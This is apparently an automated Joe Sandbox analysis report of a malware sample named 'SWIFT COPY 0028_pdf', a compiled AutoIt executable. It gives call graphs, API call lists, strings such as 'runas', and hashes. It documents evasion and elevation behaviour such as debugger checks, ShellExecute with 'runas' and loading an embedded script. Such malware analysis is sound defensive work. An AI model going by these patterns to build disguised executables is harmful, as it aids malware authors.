96394 96c41b 96393->96394 96395 9244ed 64 API calls 96393->96395 96394->96360 96394->96361 96396 96c432 96395->96396 96397 9244ed 64 API calls 96396->96397 96398 96c442 96397->96398 96399 9244ed 64 API calls 96398->96399 96400 96c45d 96399->96400 96401 9244ed 64 API calls 96400->96401 96402 96c478 96401->96402 96403 924517 83 API calls 96402->96403 96404 96c48f 96403->96404 96405 94395c __crtGetStringTypeA_stat 47 API calls 96404->96405 96406 96c496 96405->96406 96407 94395c __crtGetStringTypeA_stat 47 API calls 96406->96407 96408 96c4a0 96407->96408 96409 9244ed 64 API calls 96408->96409 96410 96c4b4 96409->96410 96411 96bf5a GetSystemTimeAsFileTime 96410->96411 96412 96c4c7 96411->96412 96413 96c4f1 96412->96413 96414 96c4dc 96412->96414 96416 96c556 96413->96416 96417 96c4f7 96413->96417 96415 941c9d _free 47 API calls 96414->96415 96418 96c4e2 96415->96418 96420 941c9d _free 47 API calls 96416->96420 96419 96b965 118 API calls 96417->96419 96421 941c9d _free 47 API calls 96418->96421 96422 96c54e 96419->96422 96420->96394 96421->96394 96423 941c9d _free 47 API calls 96422->96423 96423->96394 96424->96382 96425->96384 96426->96381 96428 94f8a0 __ftell_nolock 96427->96428 96429 9240b4 GetLongPathNameW 96428->96429 96430 926a63 48 API calls 96429->96430 96431 9240dc 96430->96431 96432 9249a0 96431->96432 96433 92d7f7 48 API calls 96432->96433 96434 9249b2 96433->96434 96435 92660f 49 API calls 96434->96435 96436 9249bd 96435->96436 96437 9249c8 96436->96437 96438 992e35 96436->96438 96439 9264cf 48 API calls 96437->96439 96443 992e4f 96438->96443 96485 93d35e 60 API calls 96438->96485 96441 9249d4 96439->96441 96485->96438 96633 1027298 96647 1024ee8 96633->96647 96635 1027362 96650 1027188 96635->96650 96649 1025573 96647->96649 96653 1028388 GetPEB 96647->96653 96649->96635 96651 1027191 Sleep 96650->96651 96652 102719f 96651->96652 96653->96649 96654 999c06 96665 93d3be 96654->96665 96656 999c1c 96658 999c91 Mailbox 96656->96658 96674 921caa 49 API calls 96656->96674 96659 933200 331 API calls 96658->96659 96660 999cc5 96659->96660 96664 99a7ab Mailbox 96660->96664 96676 96cc5c 86 API calls 4 library calls 96660->96676 96662 999c71 96662->96660 96675 96b171 48 API calls 96662->96675 96666 93d3ca 96665->96666 96667 93d3dc 96665->96667 96677 92dcae 50 API calls Mailbox 96666->96677 96669 93d3e2 96667->96669 96670 93d40b 96667->96670 96671 93f4ea 48 API calls 96669->96671 96678 92dcae 50 API calls Mailbox 96670->96678 96673 93d3d4 96671->96673 96673->96656 96674->96662 96675->96658 96676->96664 96677->96673 96678->96673

                                                                                    Executed Functions

                                                                                    Function 0094B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 744 94b043-94b080 call 94f8a0 747 94b082-94b084 744->747 748 94b089-94b08b 744->748 749 94b860-94b86c call 94a70c 747->749 750 94b0ac-94b0d9 748->750 751 94b08d-94b0a7 call 947bda call 947c0e call 946e10 748->751 753 94b0e0-94b0e7 750->753 754 94b0db-94b0de 750->754 751->749 758 94b105 753->758 759 94b0e9-94b100 call 947bda call 947c0e call 946e10 753->759 754->753 757 94b10b-94b110 754->757 762 94b112-94b11c call 94f82f 757->762 763 94b11f-94b12d call 953bf2 757->763 758->757 787 94b851-94b854 759->787 762->763 774 94b133-94b145 763->774 775 94b44b-94b45d 763->775 774->775 777 94b14b-94b183 call 947a0d GetConsoleMode 774->777 778 94b463-94b473 775->778 779 94b7b8-94b7d5 WriteFile 775->779 777->775 800 94b189-94b18f 777->800 784 94b479-94b484 778->784 785 94b55a-94b55f 778->785 781 94b7d7-94b7df 779->781 782 94b7e1-94b7e7 GetLastError 779->782 788 94b7e9 781->788 782->788 792 94b48a-94b49a 784->792 793 94b81b-94b833 784->793 789 94b565-94b56e 785->789 790 94b663-94b66e 785->790 799 94b85e-94b85f 787->799 797 94b7ef-94b7f1 788->797 789->793 798 94b574 789->798 790->793 796 94b674 790->796 801 94b4a0-94b4a3 792->801 794 94b835-94b838 793->794 795 94b83e-94b84e call 947c0e call 947bda 793->795 794->795 802 94b83a-94b83c 794->802 795->787 803 94b67e-94b693 796->803 805 94b856-94b85c 797->805 806 94b7f3-94b7f5 797->806 807 94b57e-94b595 798->807 799->749 808 94b191-94b193 800->808 809 94b199-94b1bc GetConsoleCP 800->809 810 94b4a5-94b4be 801->810 811 94b4e9-94b520 WriteFile 801->811 802->799 815 94b699-94b69b 803->815 805->799 806->793 817 94b7f7-94b7fc 806->817 818 94b59b-94b59e 807->818 808->775 808->809 819 94b440-94b446 809->819 820 94b1c2-94b1ca 809->820 812 94b4c0-94b4ca 810->812 813 94b4cb-94b4e7 810->813 811->782 814 94b526-94b538 811->814 812->813 813->801 813->811 814->797 822 94b53e-94b54f 814->822 823 94b69d-94b6b3 815->823 824 94b6d8-94b719 WideCharToMultiByte 815->824 826 94b812-94b819 call 947bed 817->826 827 94b7fe-94b810 call 947c0e call 947bda 817->827 828 94b5a0-94b5b6 818->828 829 94b5de-94b627 WriteFile 818->829 819->806 821 94b1d4-94b1d6 820->821 830 94b1dc-94b1fe 821->830 831 94b36b-94b36e 821->831 822->792 832 94b555 822->832 833 94b6b5-94b6c4 823->833 834 94b6c7-94b6d6 823->834 824->782 836 94b71f-94b721 824->836 826->787 827->787 838 94b5cd-94b5dc 828->838 839 94b5b8-94b5ca 828->839 829->782 841 94b62d-94b645 829->841 844 94b217-94b223 call 941688 830->844 845 94b200-94b215 830->845 846 94b375-94b3a2 831->846 847 94b370-94b373 831->847 832->797 833->834 834->815 834->824 848 94b727-94b75a WriteFile 836->848 838->818 838->829 839->838 841->797 843 94b64b-94b658 841->843 843->807 850 94b65e 843->850 865 94b225-94b239 844->865 866 94b269-94b26b 844->866 851 94b271-94b283 call 9540f7 845->851 853 94b3a8-94b3ab 846->853 847->846 847->853 854 94b75c-94b776 848->854 855 94b77a-94b78e GetLastError 848->855 850->797 875 94b435-94b43b 851->875 876 94b289 851->876 858 94b3b2-94b3c5 call 955884 853->858 859 94b3ad-94b3b0 853->859 854->848 861 94b778 854->861 863 94b794-94b796 855->863 858->782 879 94b3cb-94b3d5 858->879 859->858 867 94b407-94b40a 859->867 861->863 863->788 864 94b798-94b7b0 863->864 864->803 870 94b7b6 864->870 872 94b412-94b42d 865->872 873 94b23f-94b254 call 9540f7 865->873 866->851 867->821 871 94b410 867->871 870->797 871->875 872->875 873->875 886 94b25a-94b267 873->886 875->788 877 94b28f-94b2c4 WideCharToMultiByte 876->877 877->875 882 94b2ca-94b2f0 WriteFile 877->882 880 94b3d7-94b3ee call 955884 879->880 881 94b3fb-94b401 879->881 880->782 889 94b3f4-94b3f5 880->889 881->867 882->782 885 94b2f6-94b30e 882->885 885->875 888 94b314-94b31b 885->888 886->877 888->881 890 94b321-94b34c WriteFile 888->890 889->881 890->782 891 94b352-94b359 890->891 891->875 892 94b35f-94b366 891->892 892->881
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 22f4cde1c851320073b242ecc501b3aa2cdd3ad1772a6924fc26c584c213ffa6
                                                                                    • Instruction ID: c3b02a0f04cfbf8420b06dec10c801b8d87c9e10b6d845645b200eed060cb753
                                                                                    • Opcode Fuzzy Hash: 22f4cde1c851320073b242ecc501b3aa2cdd3ad1772a6924fc26c584c213ffa6
                                                                                    • Instruction Fuzzy Hash: 79325B75B162288FDB24CF54DC81AE9B7B9FF4A314F1841D9E40AA7A91D7309E80CF52
                                                                                    Function 00923D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00923AA3,?), ref: 00923D45
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00923AA3,?), ref: 00923D57
                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,009E1148,009E1130,?,?,?,?,00923AA3,?), ref: 00923DC8
                                                                                      • Part of subcall function 00926430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00923DEE,009E1148,?,?,?,?,?,00923AA3,?), ref: 00926471
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00923AA3,?), ref: 00923E48
                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009D28F4,00000010), ref: 00991CCE
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,009E1148,?,?,?,?,?,00923AA3,?), ref: 00991D06
                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009BDAB4,009E1148,?,?,?,?,?,00923AA3,?), ref: 00991D89
                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00923AA3), ref: 00991D90
                                                                                      • Part of subcall function 00923E6E: GetSysColorBrush.USER32(0000000F), ref: 00923E79
                                                                                      • Part of subcall function 00923E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00923E88
                                                                                      • Part of subcall function 00923E6E: LoadIconW.USER32(00000063), ref: 00923E9E
                                                                                      • Part of subcall function 00923E6E: LoadIconW.USER32(000000A4), ref: 00923EB0
                                                                                      • Part of subcall function 00923E6E: LoadIconW.USER32(000000A2), ref: 00923EC2
                                                                                      • Part of subcall function 00923E6E: RegisterClassExW.USER32(?), ref: 00923F30
                                                                                      • Part of subcall function 009236B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009236E6
                                                                                      • Part of subcall function 009236B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00923707
                                                                                      • Part of subcall function 009236B8: ShowWindow.USER32(00000000,?,?,?,?,00923AA3,?), ref: 0092371B
                                                                                      • Part of subcall function 009236B8: ShowWindow.USER32(00000000,?,?,?,?,00923AA3,?), ref: 00923724
                                                                                      • Part of subcall function 00924FFC: _memset.LIBCMT ref: 00925022
                                                                                      • Part of subcall function 00924FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009250CB
                                                                                    Strings
                                                                                    • runas, xrefs: 00991D84
                                                                                    • This is a third-party compiled AutoIt script., xrefs: 00991CC8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                    • API String ID: 438480954-3287110873
                                                                                    • Opcode ID: 4a54a366689267ba1128ffb557468832881cca407ecad2a7182f8b985e778feb
                                                                                    • Instruction ID: 05693c2623decfaef2de73cafe1d556409372fc7862fc004faad6f2177a24ac9
                                                                                    • Opcode Fuzzy Hash: 4a54a366689267ba1128ffb557468832881cca407ecad2a7182f8b985e778feb
                                                                                    • Instruction Fuzzy Hash: B8514B30D0C295ABCF11ABB0FC81FED7B79AF95704F008029F102661AADA784E49DB21
                                                                                    Function 0093DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1079 93ddc0-93de4f call 92d7f7 GetVersionExW call 926a63 call 93dfb4 call 926571 1088 9924c8-9924cb 1079->1088 1089 93de55-93de56 1079->1089 1092 9924cd 1088->1092 1093 9924e4-9924e8 1088->1093 1090 93de92-93dea2 call 93df77 1089->1090 1091 93de58-93de63 1089->1091 1110 93dec7-93dee1 1090->1110 1111 93dea4-93dec1 GetCurrentProcess call 93df5f 1090->1111 1094 99244e-992454 1091->1094 1095 93de69-93de6b 1091->1095 1097 9924d0 1092->1097 1098 9924ea-9924f3 1093->1098 1099 9924d3-9924dc 1093->1099 1103 99245e-992464 1094->1103 1104 992456-992459 1094->1104 1100 992469-992475 1095->1100 1101 93de71-93de74 1095->1101 1097->1099 1098->1097 1105 9924f5-9924f8 1098->1105 1099->1093 1106 99247f-992485 1100->1106 1107 992477-99247a 1100->1107 1108 93de7a-93de89 1101->1108 1109 992495-992498 1101->1109 1103->1090 1104->1090 1105->1099 1106->1090 1107->1090 1114 99248a-992490 1108->1114 1115 93de8f 1108->1115 1109->1090 1116 99249e-9924b3 1109->1116 1112 93dee3-93def7 call 93e00c 1110->1112 1113 93df31-93df3b GetSystemInfo 1110->1113 1111->1110 1131 93dec3 1111->1131 1126 93df29-93df2f GetSystemInfo 1112->1126 1127 93def9-93df01 call 93dff4 GetNativeSystemInfo 1112->1127 1122 93df0e-93df1a 1113->1122 1114->1090 1115->1090 1119 9924bd-9924c3 1116->1119 1120 9924b5-9924b8 1116->1120 1119->1090 1120->1090 1124 93df21-93df26 1122->1124 1125 93df1c-93df1f FreeLibrary 1122->1125 1125->1124 1130 93df03-93df07 1126->1130 1127->1130 1130->1122 1133 93df09-93df0c FreeLibrary 1130->1133 1131->1110 1133->1122
                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?), ref: 0093DDEC
                                                                                    • GetCurrentProcess.KERNEL32(00000000,009BDC38,?,?), ref: 0093DEAC
                                                                                    • GetNativeSystemInfo.KERNELBASE(?,009BDC38,?,?), ref: 0093DF01
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0093DF0C
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0093DF1F
                                                                                    • GetSystemInfo.KERNEL32(?,009BDC38,?,?), ref: 0093DF29
                                                                                    • GetSystemInfo.KERNEL32(?,009BDC38,?,?), ref: 0093DF35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                    • String ID:
                                                                                    • API String ID: 3851250370-0
                                                                                    • Opcode ID: 9380643a0b59a06fe3bc1d96a46a00ed4221e2b08206121d84d36a4a03c5ddbb
                                                                                    • Instruction ID: 2c5d060f2b30dc0c44a116bf2d90e4674438b6f29d3dda2afc4ed2dff6be6e0a
                                                                                    • Opcode Fuzzy Hash: 9380643a0b59a06fe3bc1d96a46a00ed4221e2b08206121d84d36a4a03c5ddbb
                                                                                    • Instruction Fuzzy Hash: 206181B181A384DBCF15CF68A8C15ED7FB86F6A300F1949D9D8459F247C6388A09CF65
                                                                                    Function 0092406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1151 92406b-924083 CreateStreamOnHGlobal 1152 9240a3-9240a6 1151->1152 1153 924085-92409c FindResourceExW 1151->1153 1154 9240a2 1153->1154 1155 994f16-994f25 LoadResource 1153->1155 1154->1152 1155->1154 1156 994f2b-994f39 SizeofResource 1155->1156 1156->1154 1157 994f3f-994f4a LockResource 1156->1157 1157->1154 1158 994f50-994f58 1157->1158 1159 994f5c-994f6e 1158->1159 1159->1154
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0092449E,?,?,00000000,00000001), ref: 0092407B
                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0092449E,?,?,00000000,00000001), ref: 00924092
                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,0092449E,?,?,00000000,00000001,?,?,?,?,?,?,009241FB), ref: 00994F1A
                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,0092449E,?,?,00000000,00000001,?,?,?,?,?,?,009241FB), ref: 00994F2F
                                                                                    • LockResource.KERNEL32(0092449E,?,?,0092449E,?,?,00000000,00000001,?,?,?,?,?,?,009241FB,00000000), ref: 00994F42
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                    • String ID: SCRIPT
                                                                                    • API String ID: 3051347437-3967369404
                                                                                    • Opcode ID: 7822eb205cee0e2762eea8bde81ae154bc12edd4af96a64233420a894b34ef94
                                                                                    • Instruction ID: e7847c009ad3d4607081099f9689c4afcab45d6ce582476db7156217bfeabbd1
                                                                                    • Opcode Fuzzy Hash: 7822eb205cee0e2762eea8bde81ae154bc12edd4af96a64233420a894b34ef94
                                                                                    • Instruction Fuzzy Hash: 0A115A70244711AFE7218B25EC48F677BBDEFCAB51F20412CF6128A6A4DB71DC40DA60
                                                                                    Function 00966CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00992F49), ref: 00966CB9
                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00966CCA
                                                                                    • FindClose.KERNEL32(00000000), ref: 00966CDA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                    • String ID:
                                                                                    • API String ID: 48322524-0
                                                                                    • Opcode ID: 7126df3422095b575aecf11268b57ef1ef32fafdc5fe27766abcb9a1b85ccd60
                                                                                    • Instruction ID: fc78c363cc9dc2eaf521d4866358d17a59f16defa8c0836307545be6b502c86f
                                                                                    • Opcode Fuzzy Hash: 7126df3422095b575aecf11268b57ef1ef32fafdc5fe27766abcb9a1b85ccd60
                                                                                    • Instruction Fuzzy Hash: E2E0D83182981057C2146738EC0D4E9376CDE06339F504706F5F2C11D0EB74ED0096D5
                                                                                    Function 00933B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                    • String ID: @
                                                                                    • API String ID: 3728558374-2766056989
                                                                                    • Opcode ID: 2c91ffd1503530d795b6cf90a6efd47c88f739eff81a0f010a09933fbe7f56df
                                                                                    • Instruction ID: 29ef3bd3e4382db431920a3d60a936bfdedb70fe5b4b13cc5987cc1befca28b1
                                                                                    • Opcode Fuzzy Hash: 2c91ffd1503530d795b6cf90a6efd47c88f739eff81a0f010a09933fbe7f56df
                                                                                    • Instruction Fuzzy Hash: 9872BD70E042089FDF24DF98C481ABEB7B9EF88300F15C45AE955AB291DB35AE45CF91
                                                                                    Function 00933200 Relevance: 1.0, Instructions: 986COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID:
                                                                                    • API String ID: 3964851224-0
                                                                                    • Opcode ID: 579063b02ba8da24aa7eb190d961292f19af69c71c4421eb363aaa7a03325b78
                                                                                    • Instruction ID: 829c6bb4f186a33610be0a9860361c9553f5233d67c9439af4f9ae1cdc4eac02
                                                                                    • Opcode Fuzzy Hash: 579063b02ba8da24aa7eb190d961292f19af69c71c4421eb363aaa7a03325b78
                                                                                    • Instruction Fuzzy Hash: AB9276706083419FDB24DF18C484B6ABBE5BF88304F14885DF89A8B2A2D775ED45CF92
                                                                                    Function 0092E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092E959
                                                                                    • timeGetTime.WINMM ref: 0092EBFA
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092ED2E
                                                                                    • TranslateMessage.USER32(?), ref: 0092ED3F
                                                                                    • DispatchMessageW.USER32(?), ref: 0092ED4A
                                                                                    • LockWindowUpdate.USER32(00000000), ref: 0092ED79
                                                                                    • DestroyWindow.USER32 ref: 0092ED85
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0092ED9F
                                                                                    • Sleep.KERNEL32(0000000A), ref: 00995270
                                                                                    • TranslateMessage.USER32(?), ref: 009959F7
                                                                                    • DispatchMessageW.USER32(?), ref: 00995A05
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00995A19
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                    • API String ID: 2641332412-570651680
                                                                                    • Opcode ID: afb757500c3dfad5553493c9774140082606bfda9c59b7df6f938115bad7e9a3
                                                                                    • Instruction ID: 39fae9e309f5e5ad702f8e0ee34ab06251c0b8acc8e0b9babe946043d8248062
                                                                                    • Opcode Fuzzy Hash: afb757500c3dfad5553493c9774140082606bfda9c59b7df6f938115bad7e9a3
                                                                                    • Instruction Fuzzy Hash: 5962D270508350DFEB25DF28D8C5BAA77E8BF84304F08496DF98A8B296DB75D844CB52
                                                                                    Function 00955C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___createFile.LIBCMT ref: 00955EC3
                                                                                    • ___createFile.LIBCMT ref: 00955F04
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00955F2D
                                                                                    • __dosmaperr.LIBCMT ref: 00955F34
                                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00955F47
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00955F6A
                                                                                    • __dosmaperr.LIBCMT ref: 00955F73
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00955F7C
                                                                                    • __set_osfhnd.LIBCMT ref: 00955FAC
                                                                                    • __lseeki64_nolock.LIBCMT ref: 00956016
                                                                                    • __close_nolock.LIBCMT ref: 0095603C
                                                                                    • __chsize_nolock.LIBCMT ref: 0095606C
                                                                                    • __lseeki64_nolock.LIBCMT ref: 0095607E
                                                                                    • __lseeki64_nolock.LIBCMT ref: 00956176
                                                                                    • __lseeki64_nolock.LIBCMT ref: 0095618B
                                                                                    • __close_nolock.LIBCMT ref: 009561EB
                                                                                      • Part of subcall function 0094EA9C: CloseHandle.KERNELBASE(00000000,009CEEF4,00000000,?,00956041,009CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0094EAEC
                                                                                      • Part of subcall function 0094EA9C: GetLastError.KERNEL32(?,00956041,009CEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0094EAF6
                                                                                      • Part of subcall function 0094EA9C: __free_osfhnd.LIBCMT ref: 0094EB03
                                                                                      • Part of subcall function 0094EA9C: __dosmaperr.LIBCMT ref: 0094EB25
